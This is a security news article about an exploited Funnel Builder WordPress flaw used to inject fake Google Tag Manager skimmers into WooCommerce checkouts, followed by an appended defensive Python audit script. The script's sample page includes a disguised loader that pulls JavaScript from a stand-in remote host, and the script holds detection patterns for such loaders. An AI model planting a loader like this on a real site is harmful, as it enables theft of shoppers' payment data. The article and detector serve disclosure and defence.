40,000+ E-Commerce Sites Threatened by Unauthenticated Funnel Builder Exploit

Cyber RT, May 16, 2026

A critical security vulnerability in the Funnel Builder plugin for WordPress is being actively exploited to inject malicious JavaScript into WooCommerce checkout pages, stealing payment data. Affecting versions before 3.15.0.3 and over 40,000 stores, the flaw allows attackers to inject code that appears as Google Tag Manager scripts. FunnelKit has released a patch, urging users to update and review settings for unfamiliar scripts.

A critical security vulnerability has been identified in the Funnel Builder plugin for WordPress, and it is being actively exploited to inject malicious JavaScript into WooCommerce checkout pages with the goal of stealing payment data. Sansec, a Dutch e-commerce security company, has published details of the activity, noting that the flaw affects all versions of the plugin before 3.15.0.3. The plugin is widely used, with over 40,000 WooCommerce stores relying on it. The vulnerability allows unauthenticated attackers to inject arbitrary JavaScript into checkout pages, posing a significant risk to e-commerce sites using the plugin. FunnelKit, the company maintaining Funnel Builder, has responded by releasing a patch in version 3.15.0.3.

The attackers exploit the plugin by inserting fake Google Tag Manager scripts into its 'External Scripts' setting. These appear to be ordinary analytics tags but actually load a payment skimmer that steals sensitive information such as credit card details and billing addresses.

Sansec explains that the vulnerability stems from a publicly exposed checkout endpoint in Funnel Builder that lets incoming requests select which internal methods to run. Older versions of the plugin neither verified the caller's permissions nor restricted the methods that could be invoked. By exploiting this, attackers can issue unauthenticated requests that inject malicious code into the plugin's global settings, which is then executed on every checkout page.

The impact is severe: attackers can plant a malicious script tag that activates during every checkout transaction on affected WordPress sites. Sansec has observed instances where the payload disguises itself as a Google Tag Manager loader and launches JavaScript from a remote domain. That script establishes a WebSocket connection to the attacker's command-and-control server to retrieve a skimmer tailored to the victim's storefront, with the ultimate goal of stealing personal and payment information.

Site owners are advised to update Funnel Builder to the latest version and review their settings for any unfamiliar scripts, removing them if necessary. Disguising skimmers as Google Analytics or Tag Manager code is a common attacker tactic, because familiar-looking tracking tags often go unnoticed by reviewers.

This disclosure follows a recent campaign detailed by Sucuri, in which Joomla websites were backdoored with obfuscated PHP code that contacts attacker-controlled servers. Those servers send instructions to the compromised sites, allowing attackers to inject spam content or redirect visitors without the site owner's knowledge. This lets attackers alter the behavior of the infected site dynamically, without repeatedly modifying local files.

The approach used in both the WordPress and Joomla attacks reflects a broader trend in which attackers leverage trusted platforms to carry out malicious activity. By exploiting vulnerabilities in widely used plugins and content management systems, they can compromise numerous sites and harvest valuable data, underscoring the importance of regular updates and vigilant security practices for website owners.
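One way to act on the "review your settings for unfamiliar scripts" advice, as an added example that is not part of the original article or of FunnelKit's code: a Python audit that parses a checkout page's HTML, flags every script source outside an allowlist, and singles out inline loaders styled like the Google Tag Manager snippet that pull from a different host. The allowlist, the helper names and the sample HTML (including the `store.example` and `metrics.example-cdn.invalid` hosts) are constructed for this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Vetted third-party script hosts (an assumption for this example, not a FunnelKit list).
TRUSTED_SCRIPT_HOSTS = {"www.googletagmanager.com", "www.google-analytics.com"}
# Host of any URL an inline script loads from (a GTM lookalike swaps in the attacker's host).
URL_RE = re.compile(r"""(?:https?:)?//([A-Za-z0-9.-]+)[^\s'"]*""")

class ScriptCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.external, self.inline, self._buf = [], [], None
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._buf = []          # inline script: start collecting its body
    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None

def audit_checkout_html(html, site_host):
    """Return (kind, host) findings for every script source not on the allowlist."""
    allowed = TRUSTED_SCRIPT_HOSTS | {site_host}
    p = ScriptCollector()
    p.feed(html)
    findings = []
    for src in p.external:  # <script src=...>: flag any host the owner has not vetted
        host = urlparse(src if "://" in src else "https:" + src).hostname
        if host and host not in allowed:
            findings.append(("external_script", host))
    for body in p.inline:   # inline loaders: flag foreign hosts, especially GTM-styled ones
        looks_like_gtm = "gtm.js" in body or "dataLayer" in body
        for host in sorted({m.group(1) for m in URL_RE.finditer(body)} - allowed):
            findings.append(("gtm_lookalike" if looks_like_gtm else "inline_external_load", host))
        if "WebSocket(" in body:  # the skimmer described above reaches its C2 this way
            findings.append(("inline_websocket", None))
    return findings

# Constructed sample page: a genuine GTM tag, the store's own jQuery, and a fake GTM loader.
SAMPLE_CHECKOUT_HTML = """<script src="https://www.googletagmanager.com/gtm.js?id=GTM-XXXX"></script>
<script src="https://store.example/wp-includes/js/jquery/jquery.min.js"></script>
<script>(function(w,d,s){var j=d.createElement(s);j.async=true;
j.src='//metrics.example-cdn.invalid/gtm.js?id=GTM-XXXX';d.head.appendChild(j);})(window,document,'script');</script>"""
```

Run `audit_checkout_html(SAMPLE_CHECKOUT_HTML, "store.example")` against the fetched checkout page of a store whose own hostname replaces `store.example`; a `gtm_lookalike` finding is the pattern this article describes and warrants inspecting the 'External Scripts' setting.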